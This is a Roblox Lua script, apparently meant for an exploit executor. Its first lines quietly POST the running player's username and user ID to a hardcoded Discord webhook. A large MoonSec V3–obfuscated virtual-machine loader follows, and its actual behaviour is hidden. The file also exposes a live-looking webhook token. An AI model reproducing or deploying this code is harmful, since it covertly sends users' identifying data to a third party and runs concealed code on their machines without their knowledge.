local idiot = game:GetService("Players").LocalPlayer
local response = http.request(

    {
        Url = 'https://discord.com/api/webhooks/1124806229538123828/plMsSIshcA4XVUaoYGLSLV03wHoG4rv1YV6dPUyzkocP_4moDVpEs2I41mgCkfINnxpU',
        Method = 'POST',
        Headers = {
            ['Content-Type'] = 'application/json'
        },
        Body = game:GetService('HttpService'):JSONEncode({content = idiot.Name .. idiot.UserId})
    }
);
task.wait()
([[This file was protected with MoonSec V3 by federal9999 on discord]]):gsub('.+', (function(a) _vdUqbWqzCpdr = a; end)); return(function(f,...)local u;local c;local d;local o;local r;local t;local e=24915;local n=0;local l={};while n<413 do n=n+1;while n<0x1aa and e%0x4386<0x21c3 do n=n+1 e=(e*624)%41519 local a=n+e if(e%0x194c)>0xca6 then e=(e-0x148)%0x1800 while n<0x3b1 and e%0x23b8<0x11dc do n=n+1 e=(e*650)%23767 local t=n+e if(e%0x48a0)<0x2450 then e=(e+0x165)%0xa260 local e=45008 if not l[e]then l[e]=0x1 u=tonumber;end elseif e%2~=0 then e=(e*0x314)%0xbb64 local e=81475 if not l[e]then l[e]=0x1 o="\4\8\116\111\110\117\109\98\101\114\98\116\95\121\117\66\77\79\0\6\115\116\114\105\110\103\4\99\104\97\114\111\100\75\88\70\79\74\89\0\6\115\116\114\105\110\103\3\115\117\98\65\102\95\66\74\81\97\106\0\6\115\116\114\105\110\103\4\98\121\116\101\69\66\66\68\95\75\85\119\0\5\116\97\98\108\101\6\99\111\110\99\97\116\89\112\99\65\109\75\75\79\0\5\116\97\98\108\101\6\105\110\115\101\114\116\104\103\95\122\112\121\67\99\5";end else e=(e*0x2f2)%0x7153 n=n+1 local e=60171 if not l[e]then l[e]=0x1 c={};end end end elseif e%2~=0 then e=(e-0x39)%0x15ff while n<0x368 and e%0x3c28<0x1e14 do n=n+1 e=(e*938)%35343 local d=n+e if(e%0x3536)<0x1a9b then e=(e+0x1aa)%0xbe6f local e=21849 if not l[e]then l[e]=0x1 r=string;end elseif e%2~=0 then e=(e-0x31f)%0x680b local e=52806 if not l[e]then l[e]=0x1 t=getfenv and getfenv();end else e=(e*0x3f)%0x4af n=n+1 local e=1717 if not l[e]then l[e]=0x1 t=(not t)and _ENV or t;end end end else e=(e*0x1f4)%0x9140 n=n+1 while n<0xff and e%0x3cd4<0x1e6a do n=n+1 e=(e-51)%36957 local o=n+e if(e%0x450e)<0x2287 then e=(e-0x12f)%0x5a16 local e=84847 if not l[e]then l[e]=0x1 d=function(l)local e=0x01 local function n(n)e=e+n return l:sub(e-n,e-0x01)end while true do local l=n(0x01)if(l=="\5")then break end local e=r.byte(n(0x01))local e=n(e)if l=="\2"then e=c.bt_yuBMO(e)elseif l=="\3"then e=e~="\0"elseif l=="\6"then t[e]=function(n,e)return f(8,nil,f,e,n)end elseif l=="\4"then e=t[e]elseif l=="\0"then e=t[e][n(r.byte(n(0x01)))];end local n=n(0x08)c[n]=e end end end elseif e%2~=0 then e=(e-0x25)%0x91d4 local e=41834 if not l[e]then l[e]=0x1 end else e=(e-0xb0)%0x6f6e n=n+1 local e=83925 if not l[e]then l[e]=0x1 end end end end end e=(e+556)%6742 end d(o);local e={};for n=0x0,0xff do local l=c.odKXFOJY(n);e[n]=l;e[l]=n;end local function a(n)return e[n];end local l=(function(f,d)local o,l=0x01,0x10 local n={{},{},{}}local t=-0x01 local e=0x01 local r=f while true do n[0x03][c.Af_BJQaj(d,e,(function()e=o+e return e-0x01 end)())]=(function()t=t+0x01 return t end)()if t==(0x0f)then t=""l=0x000 break end end local t=#d while e<t+0x01 do n[0x02][l]=c.Af_BJQaj(d,e,(function()e=o+e return e-0x01 end)())l=l+0x01 if l%0x02==0x00 then l=0x00 c.hg_zpyCc(n[0x01],(a((((n[0x03][n[0x02][0x00]]or 0x00)*0x10)+(n[0x03][n[0x02][0x01]]or 0x00)+r)%0x100)));r=f+r;end end return c.YpcAmKKO(n[0x01])end);d(l(166,"2Ikw7f4R6p/xG:TJfJ"));d(l(190,".!Nqr+<&R?SPmDG*rNRSq?&mPm*+qm&&+<*RrPR+mS!!q!&<D<v++e<GP&P_*qS^D+!+<NSrG&!5+RR&*m!&&m?!RPD!&GmN*PrNRSP&G*q!R4Pr!Nr&?G<RPl+*SNGN!P<N?D&DN&+DPNGqNS<S?!mSN*rGS!D!qR!r+SY+qP?3m<S+rGRRmPN>+S&TDP*&rr?*G*Nrr!rhRSqq<&PR*qND&GSD7Nq!&rm:*P!P?rDN*b+<RDDS*PGmq!mN!q+qS<GqNRNPS!*LNr&N??DqOm&rrG?5r+&!PP}RqD&&m-!{rqRPS&*!GRN?Sq!!r+?!Pr!PqmSqmEmlg<Pr*!q&&SPS*qqS&+SRDGrS+GSN!rq<<G<XS&+RR&mS!<+!qrG+Na<r?&DPN+r<S!G&Nm&N?G*&!&!_+rv+r,RrP&*Pr+<qPRGDqr<SPD!R<qqF&qNA<r?DGrNm<R?NGScD<&PqDRqDoG+N3!q+&GP?*?rm<DS*yPq;RrD+!qqlNS&)!P+!S<DmPP+GS<GPND&N?+*?BS<DSDGrq&<q+&"));local e=(-10783+(function()local l,n=0,1;(function(e)e(e(e))end)(function(e)if l>151 then return e end l=l+1 n=(n+197)%2731 if(n%840)<420 then n=(n*902)%49982 return e(e(e and e))else return e end return e end)return n;end)())local b=c.GZMRFWpy or c.JcgjnXoM;local ne=(getfenv)or(function()return _ENV end);local ee=1;local d=3;local t=2;local r=4;local function y(s,...)local h=l(e,"SclHYDETb+7X*M4wHYl7HwDYE*bb+H7bXMcbD=E4TET+7I*lMXMwic7DX+*44HwbzMllbqb*EYbwbX71XDcTY4EHTTTc+b7XX**DwX<4c7HYYlEHYMbH+H7bX4M**Yj*lcHYM7w+mccElXbEX4*w4Xwb*+lMH+VbDHTXb*XHDYE+TX+e7DtMcDH*w*cMlHHbYMXDwowwcDcXHb5zYlEw+l7T77*DMbwX72X7*TM*wcDcbY+*Xc7.MY4+wM7w*HMb4MzlcTl*+7+EE4b++D77XwGTlMc4DY+Y7l*YMX4w+YXcXXM&4DY4T4bw+4X*bH*bw*cll*H*4Yw*&Xl>HDXw*M4Y47Wcc4*X4Hwl^Tc*TEX**(M4w+zMXc*YM*lwhHcblM+EXwMDwYXEccl+YcYwcwbXb7XcTHMb4wrccXlcHYD7EGTYYDXcXbMb4c74wylTH*DQY7TcbYDE7c+H+D4*cbMYlwYHDTEMbw+HXH+D77XwMYM_HYYb wEbbl7c7E*TMw4E+7Xb*cME4XYbT4+c7TTYX7wHwYcYlEYEErwMcclEHXD_EDT7XH4YX7*44HwbrMllHTH*7<Tbb*7HXM*7MwwYEcE4DH+b**4lw*%*XYMHMXw1IDDM+qXcX44i4YXbw*lbHMDwEEb7l4YTDDE7Tw4ccll*H*DDD4bll7YEDcEETXMT!7l4llY+EXbYb*+XXlEDbTb*7cXEcMYwE+EX+H++E+7T4c4XawcTHYYcDwT7c4HMYDD7Ew4H9wclcbY+YwD+bb7EbY*E*wwl+bXDXwMY4+DcTb+*+xXTMXw.w7cYllYH4bLXVwlYH+7F*b4bw+.Xc7lMDDDXEwTH7+X+McMDw:dHXE*MMMwl!TE+7EX+*YMHbb+47w*YM+HcTlbD+7YDEcE*bc+EwMlDHXYwTcT++T7cXbMXbr+E7TX*McYMD*TMb7HMEcEYT+b44XlcHcYTcTD<bl7H7**TM7774wlHH+DHEHTXcMHlYTD*Tc77+XX3*DM7wHRYc+l4YYDbEMbl7+XD*cME4XGHcDl7HwEEb%T4+H7bMDMl4Tw*HTHMHXD%EDb/bw7DX+M*4Hw*cEllHTY*ETTEb*7NXD**MwwYp+cwHHYbDMTl7T+*Xc*EMXwiQEc7lwD+D+EwbH+b7M*wMTc*cTcEl*YtD7E7bc+YM+*cMH4+wMlDlTY4Dc+Eb*+57EX7MH4Yzco4DHYYYMEHTT7H7c*E*Xcqwby7laHYD4D4bDbb*M*X*TMMwccDcXYlYDb7TlbY+774M4Mb4w8lYTYlYcDTEX+Y+DXlXwVY4Mw4cYlbYEDlT+T**c7+XXMc4DKcywHEH+T4EXTbb47lME**44wEHXH7HDYXDwT4b+X8XHwbwTwlCbc*HTYEEMTn+D7l7w*YM+wwmHc+lMDYD*E*bl+E*+*^MD47cwc*l+HwDHE+TM7b7T*4444Ew4cIHwH7YwEYT++77HX+*M4DwT 4lcDEDkEUTEb77zXY4EM4cHcwcMHHYTDMTc7l+XMh**M7w /Yc7l4YwDbbM+++T7M*cMT4Xc+cDY7D7DYE7T4+Y7bX4Mlw+c4ccl+HXDXEDT7bw7YMH*44Twb8MllHTY*Ecb+bX7HXD*4MwwYW+c4YTYbD4TlbT+*Xl*EMXwYyDc7lwYDD+E4bH");local n=0;c.mTZGzSvI(function()c.g_ftekEM()n=n+1 end)local function e(e,l)if l then return n end;n=e+n;end local l,n,a=f(0,f,e,h,c.EBBD_KUw);local function o()local n,l=c.EBBD_KUw(h,e(1,3),e(5,6)+2);e(2);return(l*256)+n;end;local k=true;local k=0 local function p()local e=n();local n=n();local d=1;local t=(l(n,1,20)*(2^32))+e;local e=l(n,21,31);local n=((-1)^l(n,32));if(e==0)then if(t==k)then return n*0;else e=1;d=0;end;elseif(e==2047)then return(t==0)and(n*(1/0))or(n*(0/0));end;return c.DmGRkylG(n,e-1023)*(d+(t/(2^52)));end;local _=n;local function m(n)local l;if(not n)then n=_();if(n==0)then return'';end;end;l=c.Af_BJQaj(h,e(1,3),e(5,6)+n-1);e(n)local e=""for n=(1+k),#l do e=e..c.Af_BJQaj(l,n,n)end return e;end;local k=#c.XLvHJzZP(u('\49.\48'))~=1 local e=n;local function g(...)return{...},c.SSmPbqmH('#',...)end local function z()local h={};local e={};local b={};local u={b,h,nil,e};local e=n()local f={}for t=1,e do local l=a();local e;if(l==2)then e=(a()~=#{});elseif(l==1)then local n=p();if k and c.fKBeBSAf(c.XLvHJzZP(n),'.(\48+)$')then n=c.SuDecXiS(n);end e=n;elseif(l==3)then e=m();end;f[t]=e;end;u[3]=a();for e=1,n()do h[e-(#{1})]=z();end;for h=1,n()do local e=a();if(l(e,1,1)==0)then local c=l(e,2,3);local a=l(e,4,6);local e={o(),o(),nil,nil};if(c==0)then e[d]=o();e[r]=o();elseif(c==#{1})then e[d]=n();elseif(c==s[2])then e[d]=n()-(2^16)elseif(c==s[3])then e[d]=n()-(2^16)e[r]=o();end;if(l(a,1,1)==1)then e[t]=f[e[t]]end if(l(a,2,2)==1)then e[d]=f[e[d]]end if(l(a,3,3)==1)then e[r]=f[e[r]]end b[h]=e;end end;return u;end;local function y(l,e,n)local t=e;local t=n;return u(c.fKBeBSAf(c.fKBeBSAf(({c.mTZGzSvI(l)})[2],e),n))end local function j(m,e,a)local function z(...)local o,j,s,z,u,n,h,_,k,p,y,l;local e=0;while-1<e do if 2<e then if e>4 then if 2~=e then for n=15,86 do if e>5 then e=-2;break;end;l=f(7);break;end;else e=-2;end else if e~=-1 then repeat if e<4 then _={};k={...};break;end;p=c.SSmPbqmH('#',...)-1;y={};until true;else _={};k={...};end end else if e>0 then if 1==e then s=f(6,14,3,64,m);u=g z=0;else n=-41;h=-1;end else o=f(6,93,1,66,m);j=f(6,87,2,51,m);end end e=e+1;end;for e=0,p do if(e>=s)then _[e-s]=k[e+1];else l[e]=k[e+1];end;end;local e=p-s+1 local e;local f;local function c(...)while true do end end while true do if n<-40 then n=n+42 end e=o[n];f=e[ee];if 18>f then if 9<=f then if f<13 then if f<=10 then if 5<=f then for r=44,77 do if 10~=f then n=e[d];break;end;l[e[t]]=(e[d]~=0);break;end;else l[e[t]]=(e[d]~=0);end else if f>9 then for n=16,94 do if 12~=f then do return end;break;end;l[e[t]]=a[e[d]];break;end;else l[e[t]]=a[e[d]];end end else if 14<f then if 16>f then l[e[t]]=l[e[d]][e[r]];else if 12<f then repeat if 16~=f then if(l[e[t]]~=e[r])then n=n+1;else n=e[d];end;break;end;n=e[d];until true;else if(l[e[t]]~=e[r])then n=n+1;else n=e[d];end;end end else if 12<f then for n=34,93 do if f<14 then l[e[t]]=l[e[d]];break;end;l[e[t]][e[d]]=l[e[r]];break;end;else l[e[t]]=l[e[d]];end end end else if f>=4 then if 6<=f then if f>6 then if 5<f then repeat if f>7 then local c,a;for f=0,6 do if f>2 then if f>=5 then if f==5 then l[e[t]]=l[e[d]][e[r]];n=n+1;e=o[n];else l[e[t]]=l[e[d]][e[r]];end else if-1<f then for c=40,75 do if 4>f then l[e[t]]=l[e[d]][e[r]];n=n+1;e=o[n];break;end;l[e[t]]=l[e[d]][e[r]];n=n+1;e=o[n];break;end;else l[e[t]]=l[e[d]][e[r]];n=n+1;e=o[n];end end else if 0>=f then c=e[t];a=l[e[d]];l[c+1]=a;l[c]=a[e[r]];n=n+1;e=o[n];else if f>1 then c=e[t]l[c]=l[c](b(l,c+1,e[d]))n=n+1;e=o[n];else l(e[t],e[d]);n=n+1;e=o[n];end end end end break;end;l(e[t],e[d]);until true;else local c,a;for f=0,6 do if f>2 then if f>=5 then if f==5 then l[e[t]]=l[e[d]][e[r]];n=n+1;e=o[n];else l[e[t]]=l[e[d]][e[r]];end else if-1<f then for c=40,75 do if 4>f then l[e[t]]=l[e[d]][e[r]];n=n+1;e=o[n];break;end;l[e[t]]=l[e[d]][e[r]];n=n+1;e=o[n];break;end;else l[e[t]]=l[e[d]][e[r]];n=n+1;e=o[n];end end else if 0>=f then c=e[t];a=l[e[d]];l[c+1]=a;l[c]=a[e[r]];n=n+1;e=o[n];else if f>1 then c=e[t]l[c]=l[c](b(l,c+1,e[d]))n=n+1;e=o[n];else l(e[t],e[d]);n=n+1;e=o[n];end end end end end else a[e[d]]=l[e[t]];end else if f>=0 then for c=21,55 do if f<5 then for f=0,3 do if f>1 then if f~=-2 then repeat if 2~=f then if(l[e[t]]~=e[r])then n=n+1;else n=e[d];end;break;end;l[e[t]]=a[e[d]];n=n+1;e=o[n];until true;else if(l[e[t]]~=e[r])then n=n+1;else n=e[d];end;end else if f~=-2 then for r=17,56 do if f~=0 then a[e[d]]=l[e[t]];n=n+1;e=o[n];break;end;l[e[t]]=(e[d]~=0);n=n+1;e=o[n];break;end;else a[e[d]]=l[e[t]];n=n+1;e=o[n];end end end break;end;l[e[t]]=a[e[d]];break;end;else for f=0,3 do if f>1 then if f~=-2 then repeat if 2~=f then if(l[e[t]]~=e[r])then n=n+1;else n=e[d];end;break;end;l[e[t]]=a[e[d]];n=n+1;e=o[n];until true;else if(l[e[t]]~=e[r])then n=n+1;else n=e[d];end;end else if f~=-2 then for r=17,56 do if f~=0 then a[e[d]]=l[e[t]];n=n+1;e=o[n];break;end;l[e[t]]=(e[d]~=0);n=n+1;e=o[n];break;end;else a[e[d]]=l[e[t]];n=n+1;e=o[n];end end end end end else if 1<f then if-1<f then for n=41,67 do if f~=3 then do return end;break;end;l[e[t]][e[d]]=e[r];break;end;else l[e[t]][e[d]]=e[r];end else if f~=-3 then for n=23,60 do if 0<f then l[e[t]][e[d]]=l[e[r]];break;end;local n=e[t]l[n]=l[n](b(l,n+1,e[d]))break;end;else l[e[t]][e[d]]=l[e[r]];end end end end else if 27<=f then if f<32 then if 28<f then if 29>=f then local e=e[t]local t,n=u(l[e](l[e+1]))h=n+e-1 local n=0;for e=e,h do n=n+1;l[e]=t[n];end;else if 28<=f then repeat if 30<f then l[e[t]]=l[e[d]];break;end;local e=e[t]l[e](b(l,e+1,h))until true;else local e=e[t]l[e](b(l,e+1,h))end end else if f>=24 then repeat if 27<f then local e=e[t]local t,n=u(l[e](l[e+1]))h=n+e-1 local n=0;for e=e,h do n=n+1;l[e]=t[n];end;break;end;local n=e[t];local t=l[e[d]];l[n+1]=t;l[n]=t[e[r]];until true;else local n=e[t];local t=l[e[d]];l[n+1]=t;l[n]=t[e[r]];end end else if 34>f then if 32==f then l[e[t]]={};else local o,a,r,f,c;local n=0;while n>-1 do if 2>=n then if 0<n then if n>=-2 then for e=45,77 do if n~=2 then a=t;break;end;r=d;break;end;else r=d;end else o=e;end else if n<=4 then if n>=0 then repeat if 3~=n then c=o[a];break;end;f=o[r];until true;else f=o[r];end else if 4~=n then repeat if n>5 then n=-2;break;end;l(c,f);until true;else n=-2;end end end n=n+1 end end else if 35>f then local r,c,s,f;l[e[t]]=a[e[d]];n=n+1;e=o[n];l[e[t]]=l[e[d]];n=n+1;e=o[n];r=e[t]c,s=u(l[r](l[r+1]))h=s+r-1 f=0;for e=r,h do f=f+1;l[e]=c[f];end;n=n+1;e=o[n];r=e[t]l[r](b(l,r+1,h))n=n+1;e=o[n];do return end;else if 36>f then l[e[t]]={};else local n=e[t]l[n]=l[n](b(l,n+1,e[d]))end end end end else if f<=21 then if f>=20 then if f>19 then for c=13,69 do if f>20 then for f=0,6 do if f>2 then if 5>f then if f>=0 then for c=48,84 do if f~=4 then l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;else l[e[t]][e[d]]=e[r];n=n+1;e=o[n];end else if 4<=f then repeat if 5<f then l[e[t]][e[d]]=e[r];break;end;l[e[t]][e[d]]=e[r];n=n+1;e=o[n];until true;else l[e[t]][e[d]]=e[r];end end else if f<=0 then l[e[t]]={};n=n+1;e=o[n];else if f>=-3 then repeat if 2~=f then l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;l[e[t]][e[d]]=e[r];n=n+1;e=o[n];until true;else l[e[t]][e[d]]=e[r];n=n+1;e=o[n];end end end end break;end;l[e[t]][e[d]]=e[r];break;end;else for f=0,6 do if f>2 then if 5>f then if f>=0 then for c=48,84 do if f~=4 then l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;else l[e[t]][e[d]]=e[r];n=n+1;e=o[n];end else if 4<=f then repeat if 5<f then l[e[t]][e[d]]=e[r];break;end;l[e[t]][e[d]]=e[r];n=n+1;e=o[n];until true;else l[e[t]][e[d]]=e[r];end end else if f<=0 then l[e[t]]={};n=n+1;e=o[n];else if f>=-3 then repeat if 2~=f then l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;l[e[t]][e[d]]=e[r];n=n+1;e=o[n];until true;else l[e[t]][e[d]]=e[r];n=n+1;e=o[n];end end end end end else if f>17 then for o=48,61 do if f~=18 then if(l[e[t]]~=e[r])then n=n+1;else n=e[d];end;break;end;l[e[t]]=l[e[d]][e[r]];break;end;else l[e[t]]=l[e[d]][e[r]];end end else if f<24 then if f~=23 then for f=0,6 do if 2>=f then if 1<=f then if f>-3 then for c=29,61 do if 2~=f then l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;else l[e[t]][e[d]]=e[r];n=n+1;e=o[n];end else l[e[t]][e[d]]=e[r];n=n+1;e=o[n];end else if f<5 then if-1<f then repeat if f~=4 then l[e[t]][e[d]]=e[r];n=n+1;e=o[n];break;end;l[e[t]][e[d]]=e[r];n=n+1;e=o[n];until true;else l[e[t]][e[d]]=e[r];n=n+1;e=o[n];end else if f==5 then l[e[t]][e[d]]=e[r];n=n+1;e=o[n];else l[e[t]][e[d]]=l[e[r]];end end end end else l[e[t]]=(e[d]~=0);end else if 25<=f then if 23<=f then for n=45,87 do if f~=25 then local n=e[t];local t=l[e[d]];l[n+1]=t;l[n]=t[e[r]];break;end;local e=e[t]l[e](b(l,e+1,h))break;end;else local e=e[t]l[e](b(l,e+1,h))end else a[e[d]]=l[e[t]];end end end end end n=1+n;end;end;return z end;local t=0xff;local a={};local r=(1);local d='';(function(n)local l=n local o=0x00 local e=0x00 l={(function(f)if o>0x1f then return f end o=o+1 e=(e+0xc6b-f)%0x37 return(e%0x03==0x0 and(function(l)if not n[l]then e=e+0x01 n[l]=(0x5c);end return true end)'FuXjT'and l[0x1](0x140+f))or(e%0x03==0x1 and(function(l)if not n[l]then e=e+0x01 n[l]=(0xd4);end return true end)'YuRFu'and l[0x3](f+0x222))or(e%0x03==0x2 and(function(l)if not n[l]then e=e+0x01 n[l]=(0xc1);t[2]=(t[2]*(y(function()a()end,b(d))-y(t[1],b(d))))+1;a[r]={};t=t[2];r=r+t;end return true end)'hSguA'and l[0x2](f+0x1e3))or f end),(function(d)if o>0x25 then return d end o=o+1 e=(e+0xdd3-d)%0x46 return(e%0x03==0x1 and(function(l)if not n[l]then e=e+0x01 n[l]=(0xdf);a[r]=ne();r=r+t;end return true end)'OrwXy'and l[0x2](0x223+d))or(e%0x03==0x2 and(function(l)if not n[l]then e=e+0x01 n[l]=(0x77);end return true end)'CXEPP'and l[0x3](d+0x3bd))or(e%0x03==0x0 and(function(l)if not n[l]then e=e+0x01 n[l]=(0xf0);end return true end)'FnCvc'and l[0x1](d+0x1ab))or d end),(function(f)if o>0x1e then return f end o=o+1 e=(e+0x429-f)%0xa return(e%0x03==0x2 and(function(l)if not n[l]then e=e+0x01 n[l]=(0xbf);end return true end)'ofUXC'and l[0x2](0x1f2+f))or(e%0x03==0x0 and(function(l)if not n[l]then e=e+0x01 n[l]=(0x3e);d={d..'\58 a',d};a[r]=z();r=r+((not c.uSVtajFM)and 1 or 0);d[1]='\58'..d[1];t[2]=0xff;end return true end)'nQvSB'and l[0x1](f+0x2c7))or(e%0x03==0x1 and(function(l)if not n[l]then e=e+0x01 n[l]=(0xbe);d='\37';t={function()t()end};d=d..'\100\43';end return true end)'Dhics'and l[0x3](f+0x236))or f end)}l[0x3](0x207e)end){};local e=j(b(a));return e(...);end return y((function()local n={}local e=0x01;local l;if c.uSVtajFM then l=c.uSVtajFM(y)else l=''end if c.fKBeBSAf(l,c._UUbTpcx)then e=e+0;else e=e+1;end n[e]=0x02;n[n[e]+0x01]=0x03;return n;end)(),...)end)((function(e,l,n,d,t,r)local r;if 3<e then if e>5 then if 7<=e then if 5<=e then repeat if 8~=e then do return setmetatable({},{['__\99\97\108\108']=function(e,t,l,d,n)if n then return e[n]elseif d then return e else e[t]=l end end})end break;end;do return n(e,nil,n);end until true;else do return n(e,nil,n);end end else do return t[n]end;end else if 1~=e then repeat if e>4 then local e=d;do return function()local n=l(n,e(e,e),e(e,e));e(1);return n;end;end;break;end;local e=d;local o,f,d=t(2);do return function()local r,t,l,n=l(n,e(e,e),e(e,e)+3);e(4);return(n*o)+(l*f)+(t*d)+r;end;end;until true;else local e=d;local d,t,r=t(2);do return function()local l,n,f,o=l(n,e(e,e),e(e,e)+3);e(4);return(o*d)+(f*t)+(n*r)+l;end;end;end end else if 2<=e then if e>=0 then for r=47,63 do if e~=3 then do return 16777216,65536,256 end;break;end;do return l(1),l(4,t,d,n,l),l(5,t,d,n)end;break;end;else do return 16777216,65536,256 end;end else if 1>e then do return l(1),l(4,t,d,n,l),l(5,t,d,n)end;else do return function(l,e,n)if n then local e=(l/2^(e-1))%2^((n-1)-(e-1)+1);return e-e%1;else local e=2^(e-1);return(l%(e+e)>=e)and 1 or 0;end;end;end;end end end end),...)

